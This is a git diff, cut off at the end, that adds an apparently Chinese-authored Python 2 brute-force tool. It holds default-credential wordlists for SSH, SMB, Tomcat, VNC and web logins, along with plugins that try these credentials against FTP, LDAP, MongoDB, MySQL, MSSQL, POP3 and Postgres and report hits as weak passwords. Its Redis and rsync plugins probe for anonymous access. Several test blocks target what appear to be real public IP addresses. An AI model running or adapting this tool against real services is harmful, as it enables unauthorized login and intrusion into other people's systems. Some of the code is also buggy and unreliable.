+mssql|^\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\x00.\x00\x00\x01\x00\x00\x00\x15.* +mssql|^\x04\x01\0\x25\0\0\x01\0\0\0\x15\0\x06\x01.* +mssql|^\x04\x01\x00\x25\x00\x00\x01.* +mysql|^\x19\x00\x00\x00\x0a +mysql|^\x2c\x00\x00\x00\x0a +mysql|hhost \' +mysql|khost \' +mysql|mysqladmin +mysql|(.*)5(.*)log +mysql|(.*)4(.*)log +mysql|whost \' +mysql|^\(\x00\x00 +mysql|this MySQL +mysql|^N\x00 +mysql|(.*)mysql(.*) +mssql|;MSSQLSERVER; +oracle|\(ERROR_STACK=\(ERROR=\(CODE= +oracle|\(ADDRESS=\(PROTOCOL= +postgres|Invalid packet length +postgres|^EFATAL +rsync|^@RSYNCD:.* +snmp|\x70\x75\x62\x6c\x69\x63\xa2 +snmp|\x41\x01\x02 +ssh|^SSH- +ssh|^SSH-.*openssh +telnet|^\xff\xfd +telnet-disabled|Telnet is disabled now +telnet|^\xff\xfe +telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.* +vnc|^RFB.*' diff --git a/Bruteforce/conf/smb.conf b/Bruteforce/conf/smb.conf new file mode 100644 index 0000000..1ed9085 --- /dev/null +++ b/Bruteforce/conf/smb.conf @@ -0,0 +1,67 @@ +administrator:1 +administrator:12 +administrator: +administrator:administrator +administrator:123 +administrator:1234 +administrator:12345 +administrator:123456 +administrator:1234567 +administrator:12345678 +administrator:123456789 +administrator:1234567890 +administrator:654321 +administrator:54321 +administrator:00000000 +administrator:88888888 +administrator:pass +administrator:password +administrator:passwd +administrator:!@#$%^ +administrator:1q2w3e +administrator:qawsed +administrator:pwd +administrator:1qaz2ws3e4 +administrator:qazwsxedc +administrator:!@#$%^&* +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:123123 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/snmp.conf b/Bruteforce/conf/snmp.conf new file mode 100644 index 0000000..d70ebaa --- /dev/null +++ b/Bruteforce/conf/snmp.conf @@ -0,0 +1 @@ +public \ No newline at end of file diff --git a/Bruteforce/conf/ssh.conf b/Bruteforce/conf/ssh.conf new file mode 100644 index 0000000..e5e62af --- /dev/null +++ b/Bruteforce/conf/ssh.conf @@ -0,0 +1,86 @@ +root:1 +root:12 +root:root +root:root123 +root:root123456 +root:123 +root:1234 +root:12345 +root:123456 +root:1234567 +root:12345678 +root:123456789 +root:1234567890 +root:654321 +root:54321 +root:00000000 +root:88888888 +root:pass +root:password +root:passwd +root:!@#$%^ +root:1q2w3e +root:qawsed +root:pwd +root:test +root:qwe123 +root:1qaz2ws3e4 +root:qazwsxedc +root:!@#$%^&* +root:root123 +root:root123456 +root:rootpass +root:rootpassword +root:rootpasswd +root:admin +root:admin123 +root:- +root:_ +root:1qaz2wsx +root:666666 +root:888888 +root:123123 +root:toor +root:123abc +root:passw0rd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:123123 +test:12345 +test:123456 +test:1234567 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 diff --git a/Bruteforce/conf/tomcat.conf b/Bruteforce/conf/tomcat.conf new file mode 100644 index 0000000..4eb9405 --- /dev/null +++ b/Bruteforce/conf/tomcat.conf @@ -0,0 +1,69 @@ +tomcat:1 +tomcat:12 +tomcat:tomcat +tomcat:tomcat123 +tomcat:tomcat123456 +tomcat:123 +tomcat:1234 +tomcat:12345 +tomcat:123456 +tomcat:1234567 +tomcat:12345678 +tomcat:123456789 +tomcat:1234567890 +tomcat:654321 +tomcat:54321 +tomcat:00000000 +tomcat:88888888 +tomcat:pass +tomcat:password +tomcat:passwd +tomcat:!@#$%^ +tomcat:1q2w3e +tomcat:qawsed +tomcat:pwd +tomcat:1qaz2ws3e4 +tomcat:qazwsxedc +tomcat:!@#$%^&* +tomcat:s3cret +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/conf/vnc.conf b/Bruteforce/conf/vnc.conf new file mode 100644 index 0000000..9d690c9 --- /dev/null +++ b/Bruteforce/conf/vnc.conf @@ -0,0 +1,34 @@ +root +vnc +vnc123 +vncpass +vnc123456 +vncpassword +vncpasswd +123 +1234 +12345 +123456 +1234567 +12345678 +123456789 +1234567890 +654321 +rootpass +54321 +00000000 +88888888 +pass +password +passwd +!@#$%^ +1q2w3e +qawsed +pwd +1qaz2ws3e4 +qazwsxedc +!@#$%^&* +root123 +root123456 +rootpassword +rootpasswd \ No newline at end of file diff --git a/Bruteforce/conf/web.conf b/Bruteforce/conf/web.conf new file mode 100644 index 0000000..b4db38f --- /dev/null +++ b/Bruteforce/conf/web.conf @@ -0,0 +1,69 @@ +cisco:1 +cisco:12 +cisco:cisco +cisco:123 +cisco:1234 +cisco:12345 +cisco:123456 +cisco:1234567 +cisco:12345678 +cisco:123456789 +cisco:1234567890 +cisco:654321 +cisco:54321 +cisco:00000000 +cisco:88888888 +cisco:pass +cisco:password +cisco:passwd +cisco:!@#$%^ +cisco:1q2w3e +cisco:qawsed +cisco:pwd +cisco:1qaz2ws3e4 +cisco:qazwsxedc +cisco:!@#$%^&* +cisco:rootpass +cisco:rootpassword +cisco:rootpasswd +admin:1 +admin:12 +admin:admin +admin:123 +admin:1234 +admin:12345 +admin:123456 +admin:1234567 +admin:12345678 +admin:123456789 +admin:1234567890 +admin:654321 +admin:54321 +admin:00000000 +admin:88888888 +admin:pass +admin:password +admin:passwd +admin:!@#$%^ +admin:1q2w3e +admin:qawsed +admin:pwd +admin:1qaz2ws3e4 +admin:qazwsxedc +admin:!@#$%^&* +admin:rootpass +admin:rootpassword +admin:rootpasswd +test:1 +test:12 +test:123 +test:1234 +test:12345 +test:123456 +test:1234567 +test:123123 +test:12345678 +test:123456789 +test:test +test:654321 +test:54321 \ No newline at end of file diff --git a/Bruteforce/factorys/__init__.py b/Bruteforce/factorys/__init__.py new file mode 100644 index 0000000..013e4b7 --- /dev/null +++ b/Bruteforce/factorys/__init__.py @@ -0,0 +1 @@ +#!/usr/bin/python diff --git a/Bruteforce/factorys/__init__.pyc b/Bruteforce/factorys/__init__.pyc new file mode 100644 index 0000000..497125a Binary files /dev/null and b/Bruteforce/factorys/__init__.pyc differ diff --git a/Bruteforce/factorys/pluginFactory.py b/Bruteforce/factorys/pluginFactory.py new file mode 100644 index 0000000..b64b07c --- /dev/null +++ b/Bruteforce/factorys/pluginFactory.py @@ -0,0 +1,101 @@ +# coding: utf-8 +__author__="wilson" +import os +import sys + +sys.path.append("../") + +from plugins.ftp import * +from plugins.smb import * +from plugins.mysql import * +from plugins.mssql import * +from plugins.ldapd import * +from plugins.mongodb import * +from plugins.redisexp import * +from plugins.rsync import * +from plugins.snmp import * +from plugins.ssh import * +from plugins.ssltest import * +from plugins.vnc import * +from plugins.web import * + +def ftpburp(c): + t = ftp_burp(c) + return t + +def smbburp(c): + t = smb_burp(c) + return t + +def mysqlburp(c): + t = mysql_burp(c) + return t + +def mssqlburp(c): + t = mssql_burp(c) + return t + +def ldapburp(c): + t = ldap_burp(c) + return t + +def mongodbburp(c): + t = mongodb_burp(c) + return t + +def redisburp(c): + t = redis_burp(c) + return t + +def rsyncburp(c): + t = rsync_burp(c) + return t + +def snmpburp(c): + t = snmp_burp(c) + return t + +def sshburp(c): + t = ssh_burp(c) + return t + +def sslburp(c): + t = ssl_burp(c) + return t + +def vncburp(c): + t = vnc_burp(c) + return t + +def webburp(c): + t = web_burp(c) + return t +#类 +class pluginFactory(): + def __init__(self,c): + self.pluginList=[] + self.config=c + self.pluginCategory= { + "ftp":ftpburp, + "smb":smbburp, + "mysql":mysqlburp, + "mssql":mssqlburp, + "ldap":ldapburp, + "mongodb":mongodbburp, + "redis":redisburp, + "rsync":rsyncburp, + "snmp":snmpburp, + "ssh":sshburp, + "ssl":sslburp, + "vnc":vncburp, + "web":webburp, + } + self.get_pluginList() + + + def get_pluginList(self): + for name in self.pluginCategory: + #实例化每个类 + result_t=self.pluginCategory.get(name)(self.config) + self.pluginList.append(result_t) + diff --git a/Bruteforce/factorys/pluginFactory.pyc b/Bruteforce/factorys/pluginFactory.pyc new file mode 100644 index 0000000..f946932 Binary files /dev/null and b/Bruteforce/factorys/pluginFactory.pyc differ diff --git a/Bruteforce/plugins/.DS_Store b/Bruteforce/plugins/.DS_Store new file mode 100644 index 0000000..bac480a Binary files /dev/null and b/Bruteforce/plugins/.DS_Store differ diff --git a/Bruteforce/plugins/__init__.py b/Bruteforce/plugins/__init__.py new file mode 100644 index 0000000..7c9c8f4 --- /dev/null +++ b/Bruteforce/plugins/__init__.py @@ -0,0 +1 @@ +__author__ = 'wilson' diff --git a/Bruteforce/plugins/__init__.pyc b/Bruteforce/plugins/__init__.pyc new file mode 100644 index 0000000..5cb4cab Binary files /dev/null and b/Bruteforce/plugins/__init__.pyc differ diff --git a/Bruteforce/plugins/ftp.py b/Bruteforce/plugins/ftp.py new file mode 100644 index 0000000..fff0050 --- /dev/null +++ b/Bruteforce/plugins/ftp.py @@ -0,0 +1,76 @@ +#coding=utf-8 +import time +import threading +from multiprocessing.dummy import Pool +from printers import printPink,printGreen +from ftplib import FTP + + +class ftp_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/ftp.conf") + + + def ftp_connect(self,ip,username,password,port): + crack=0 + try: + ftp=FTP() + ftp.connect(ip,str(port)) + ftp.login(user=username,passwd=password) + crack=1 + ftp.close() + except Exception,e: + self.lock.acquire() + print "%s ftp service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + return crack + + + def ftp_l(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + if self.ftp_connect(ip,username,password,port)==1: + self.lock.acquire() + printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ftp']): + printPink("crack ftp now...") + print "[*] start crack ftp %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['ftp']: + pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop ftp serice %s" % time.ctime() + print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ftp': ['192.168.1.1:21']} + pinglist=['192.168.1.1'] + test=ftp_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + diff --git a/Bruteforce/plugins/ftp.pyc b/Bruteforce/plugins/ftp.pyc new file mode 100644 index 0000000..cc1ec69 Binary files /dev/null and b/Bruteforce/plugins/ftp.pyc differ diff --git a/Bruteforce/plugins/ldapd.py b/Bruteforce/plugins/ldapd.py new file mode 100644 index 0000000..45f2a69 --- /dev/null +++ b/Bruteforce/plugins/ldapd.py @@ -0,0 +1,86 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import ldap + +class ldap_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/ldapd.conf") + + + def ldap_connect(self,ip,username,password,port): + creak=0 + try: + ldappath='ldap://'+ip+':'+port+'/' + l = ldap.initialize(ldappath) + re=l.simple_bind(username,password) + if re==1: + creak=1 + except Exception,e: + if e[0]['desc']=="Can't contact LDAP server": + creak=2 + pass + return creak + + def ldap_creak(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.ldap_connect(ip,username,password,port) + if flag==2: + self.lock.acquire() + printGreen("%s ldap at %s can't connect\r\n" %(ip,port)) + self.lock.release() + break + + if flag==1: + self.lock.acquire() + printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + else: + self.lock.acquire() + print "%s ldap service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + except Exception,e: + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ldap']): + printPink("crack ldap now...") + print "[*] start ldap %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['ldap']: + pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1])) + pool.close() + pool.join() + + print "[*] stop ldap serice %s" % time.ctime() + print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ldap': ['124.172.223.236:389']} + pinglist=['192.168.1.1'] + test=ldap_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + + diff --git a/Bruteforce/plugins/ldapd.pyc b/Bruteforce/plugins/ldapd.pyc new file mode 100644 index 0000000..7a0ebdf Binary files /dev/null and b/Bruteforce/plugins/ldapd.pyc differ diff --git a/Bruteforce/plugins/mongodb.py b/Bruteforce/plugins/mongodb.py new file mode 100644 index 0000000..a1d7cbe --- /dev/null +++ b/Bruteforce/plugins/mongodb.py @@ -0,0 +1,101 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printRed,printGreen +from multiprocessing.dummy import Pool +import pymongo + + +class mongodb_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/mongodb.conf") + + + def mongoDB_connect(self,ip,username,password,port): + crack=0 + try: + connection=pymongo.Connection(ip,port) + db=connection.admin + db.collection_names() + self.lock.acquire() + printRed('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port)) + self.result.append('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port)) + self.lock.release() + crack=1 + + except Exception,e: + if e[0]=='database error: not authorized for query on admin.system.namespaces': + try: + r=db.authenticate(username,password) + if r!=False: + crack=2 + else: + self.lock.acquire() + crack=3 + print "%s mongodb service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + except Exception,e: + pass + + else: + printRed('%s mongodb service at %s not connect' %(ip,port)) + crack=4 + return crack + + + + def mongoDB(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.mongoDB_connect(ip,username,password,port) + if flag in [1,4]: + break + + if flag==2: + self.lock.acquire() + printGreen("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['mongodb']): + printPink("crack mongodb now...") + print "[*] start crack mongodb %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['mongodb']: + pool.apply_async(func=self.mongoDB,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + print "[*] stop mongoDB serice %s" % time.ctime() + print "[*] crack mongoDB done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'mongodb': ['112.90.23.158:27017']} + pinglist=['192.168.1.1'] + test=mongodb_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + + + diff --git a/Bruteforce/plugins/mongodb.pyc b/Bruteforce/plugins/mongodb.pyc new file mode 100644 index 0000000..4d027b5 Binary files /dev/null and b/Bruteforce/plugins/mongodb.pyc differ diff --git a/Bruteforce/plugins/mssql.py b/Bruteforce/plugins/mssql.py new file mode 100644 index 0000000..2706a03 --- /dev/null +++ b/Bruteforce/plugins/mssql.py @@ -0,0 +1,67 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import pymssql + + + +class mssql_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/mssql.conf") + + def mssql_connect(self,ip,username,password,port): + crack =0 + try: + db=pymssql.connect(host=str(ip)+':'+str(port),user=username,password=password) + if db: + crack=1 + db.close() + except Exception, e: + self.lock.acquire() + print "%s sql service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + return crack + + + def mssq1(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=mssql_connect(ip,username,password,port) + if flag==2: + break + if flag==1: + self.lock.acquire() + printGreen("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['mysql']): + printPink("crack sql serice now...") + print "[*] start crack sql serice %s" % time.ctime() + starttime=time.time() + pool=Pool(threads) + for ip in ipdict['mssql']: + pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop crack sql serice %s" % time.ctime() + print "[*] crack sql serice done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + diff --git a/Bruteforce/plugins/mssql.pyc b/Bruteforce/plugins/mssql.pyc new file mode 100644 index 0000000..2011009 Binary files /dev/null and b/Bruteforce/plugins/mssql.pyc differ diff --git a/Bruteforce/plugins/mysql.py b/Bruteforce/plugins/mysql.py new file mode 100644 index 0000000..4388efa --- /dev/null +++ b/Bruteforce/plugins/mysql.py @@ -0,0 +1,80 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import MySQLdb + + +class mysql_burp(object): + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/mysql.conf") + + def mysql_connect(self,ip,username,password,port): + crack =0 + try: + db=MySQLdb.connect(ip,username,password,port=port) + if db: + crack=1 + db.close() + except Exception, e: + if e[0]==1045: + self.lock.acquire() + print "%s mysql's %s:%s login fail" %(ip,username,password) + self.lock.release() + else: + self.lock.acquire() + print "connect %s mysql service at %s login fail " %(ip,port) + self.lock.release() + crack=2 + return crack + + def mysq1(self,ip,port): + try: + for data in self.lines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.mysql_connect(ip,username,password,port) + if flag==2: + break + + if flag==1: + self.lock.acquire() + printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + break + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['mysql']): + printPink("crack mysql now...") + print "[*] start crack mysql %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + for ip in ipdict['mysql']: + pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop crack mysql %s" % time.ctime() + print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'mysql': ['127.0.0.1:3306']} + pinglist=['127.0.0.1'] + test=mysql_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") \ No newline at end of file diff --git a/Bruteforce/plugins/mysql.pyc b/Bruteforce/plugins/mysql.pyc new file mode 100644 index 0000000..d557ab3 Binary files /dev/null and b/Bruteforce/plugins/mysql.pyc differ diff --git a/Bruteforce/plugins/ndr.pyc b/Bruteforce/plugins/ndr.pyc new file mode 100644 index 0000000..5d3e32c Binary files /dev/null and b/Bruteforce/plugins/ndr.pyc differ diff --git a/Bruteforce/plugins/pop3.py b/Bruteforce/plugins/pop3.py new file mode 100644 index 0000000..dab169e --- /dev/null +++ b/Bruteforce/plugins/pop3.py @@ -0,0 +1,61 @@ +#coding=utf-8 +import time +from printers import printPink,printGreen +import threading +from multiprocessing.dummy import Pool +import poplib + +def pop3_Connection(ip,username,password,port): + try: + pp = poplib.POP3(ip) + #pp.set_debuglevel(1) + pp.user(username) + pp.pass_(password) + (mailCount,size) = pp.stat() + pp.quit() + if mailCount: + lock.acquire() + printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + lock.release() + except Exception,e: + print e + lock.acquire() + print "%s pop3 service 's %s:%s login fail " %(ip,username,password) + lock.release() + pass + +def pop3_l(ip,port): + try: + d=open('conf/pop3.conf','r') + data=d.readline().strip('\r\n') + while(data): + username=data.split(':')[0] + password=data.split(':')[1] + pop3_Connection(ip,username,password,port) + data=d.readline().strip('\r\n') + except Exception,e: + print e + pass + +def pop_main(ipdict,threads): + printPink("crack pop now...") + print "[*] start crack pop %s" % time.ctime() + starttime=time.time() + + global lock + lock = threading.Lock() + global result + result=[] + + pool=Pool(threads) + + for ip in ipdict['pop3']: + pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop pop serice %s" % time.ctime() + print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime) + return result \ No newline at end of file diff --git a/Bruteforce/plugins/pop3.pyc b/Bruteforce/plugins/pop3.pyc new file mode 100644 index 0000000..4c78f08 Binary files /dev/null and b/Bruteforce/plugins/pop3.pyc differ diff --git a/Bruteforce/plugins/postgres.py b/Bruteforce/plugins/postgres.py new file mode 100644 index 0000000..b269e62 --- /dev/null +++ b/Bruteforce/plugins/postgres.py @@ -0,0 +1,73 @@ +#coding=utf-8 +import time +import threading +from printers import printPink,printGreen +from multiprocessing.dummy import Pool +import psycopg2 +import re + + +def postgres_connect(ip,username,password,port): + crack =0 + try: + db=psycopg2.connect(user=username, password=password, host=ip, port=port) + if db: + crack=1 + db.close() + except Exception, e: + if re.findall(".*Password.*",e[0]): + lock.acquire() + print "%s postgres's %s:%s login fail" %(ip,username,password) + lock.release() + crack=2 + else: + lock.acquire() + print "connect %s postgres service at %s login fail " %(ip,port) + lock.release() + crack=3 + pass + return crack + +def postgreS(ip,port): + try: + d=open('conf/postgres.conf','r') + data=d.readline().strip('\r\n') + while(data): + username=data.split(':')[0] + password=data.split(':')[1] + flag=postgres_connect(ip,username,password,port) + time.sleep(0.1) + if flag==3: + break + + if flag==1: + lock.acquire() + printGreen("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + result.append("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + lock.release() + break + data=d.readline().strip('\r\n') + except Exception,e: + print e + pass + +def postgres_main(ipdict,threads): + printPink("crack postgres now...") + print "[*] start postgres %s" % time.ctime() + starttime=time.time() + + global lock + lock = threading.Lock() + global result + result=[] + + pool=Pool(threads) + + for ip in ipdict['postgres']: + pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + print "[*] stop crack postgres %s" % time.ctime() + print "[*] crack postgres done,it has Elapsed time:%s " % (time.time()-starttime) + return result \ No newline at end of file diff --git a/Bruteforce/plugins/postgres.pyc b/Bruteforce/plugins/postgres.pyc new file mode 100644 index 0000000..b428eee Binary files /dev/null and b/Bruteforce/plugins/postgres.pyc differ diff --git a/Bruteforce/plugins/printers.pyc b/Bruteforce/plugins/printers.pyc new file mode 100644 index 0000000..bbe52c0 Binary files /dev/null and b/Bruteforce/plugins/printers.pyc differ diff --git a/Bruteforce/plugins/redisexp.py b/Bruteforce/plugins/redisexp.py new file mode 100644 index 0000000..89a5a45 --- /dev/null +++ b/Bruteforce/plugins/redisexp.py @@ -0,0 +1,66 @@ +#coding=utf-8 +import time +import threading +from threading import Thread +from printers import printPink,printGreen +from Queue import Queue +import redis + +class redis_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + #self.lines=self.config.file2list("conf/redis.conf") + self.sp=Queue() + + def redisexp(self): + while True: + ip,port=self.sp.get() + try: + r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8) + r.dbsize() + self.lock.acquire() + printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port)) + self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port)) + self.lock.release() + except Exception,e: + pass + self.sp.task_done() + + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['redis']): + printPink("crack redis now...") + print "[*] start crack redis %s" % time.ctime() + starttime=time.time() + + for i in xrange(threads): + t = Thread(target=self.redisexp) + t.setDaemon(True) + t.start() + + for ip in ipdict['redis']: + self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + self.sp.join() + + + print "[*] stop redis serice %s" % time.ctime() + print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'redis': ['101.201.177.35:6379']} + pinglist=['101.201.177.35'] + test=redis_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + diff --git a/Bruteforce/plugins/redisexp.pyc b/Bruteforce/plugins/redisexp.pyc new file mode 100644 index 0000000..96f0a60 Binary files /dev/null and b/Bruteforce/plugins/redisexp.pyc differ diff --git a/Bruteforce/plugins/rsync.py b/Bruteforce/plugins/rsync.py new file mode 100644 index 0000000..4ce37d4 --- /dev/null +++ b/Bruteforce/plugins/rsync.py @@ -0,0 +1,97 @@ +# -*- coding: utf-8 -*- +import threading +from printers import printPink,printRed,printGreen +from multiprocessing.dummy import Pool +from Queue import Queue +import re +import time +import threading +from threading import Thread +from rsynclib import * +import sys +import socket +socket.setdefaulttimeout(10) +sys.path.append("../") + +class rsync_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.sp=Queue() + + def get_ver(self,host): + debugging = 0 + r = rsync(host) + r.set_debuglevel(debugging) + return r.server_protocol_version + + + def rsync_connect(self,ip,port): + creak=0 + try: + ver=self.get_ver(ip)# get rsync moudle + fp = socket.create_connection((ip, port), timeout=8) + fp.recv(99) + + fp.sendall(ver.strip('\r\n')+'\n') + time.sleep(3) + fp.sendall('\n') + resp = fp.recv(99) + + modules = [] + for line in resp.split('\n'): + #print line + modulename = line[:line.find(' ')] + if modulename: + if modulename !='@RSYNCD:': + self.lock.acquire() + printGreen("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename)) + self.result.append("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename)) + #print "find %s module in %s at %s" %(modulename,ip,port) + self.lock.release() + modules.append(modulename) + + except Exception,e: + print e + pass + return creak + + + def rsync_creak(self,ip,port): + try: + self.rsync_connect(ip,port) + except Exception,e: + print e + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['rsync']): + printPink("crack rsync now...") + print "[*] start crack rsync %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['rsync']: + pool.apply_async(func=self.rsync_creak,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop rsync serice %s" % time.ctime() + print "[*] crack rsync done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + +if __name__ == '__main__': + from comm.config import * + c=config() + ipdict={'rsync': ['103.228.69.151:873']} + pinglist=['103.228.69.151'] + test=rsync_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + + diff --git a/Bruteforce/plugins/rsync.pyc b/Bruteforce/plugins/rsync.pyc new file mode 100644 index 0000000..4fd4d74 Binary files /dev/null and 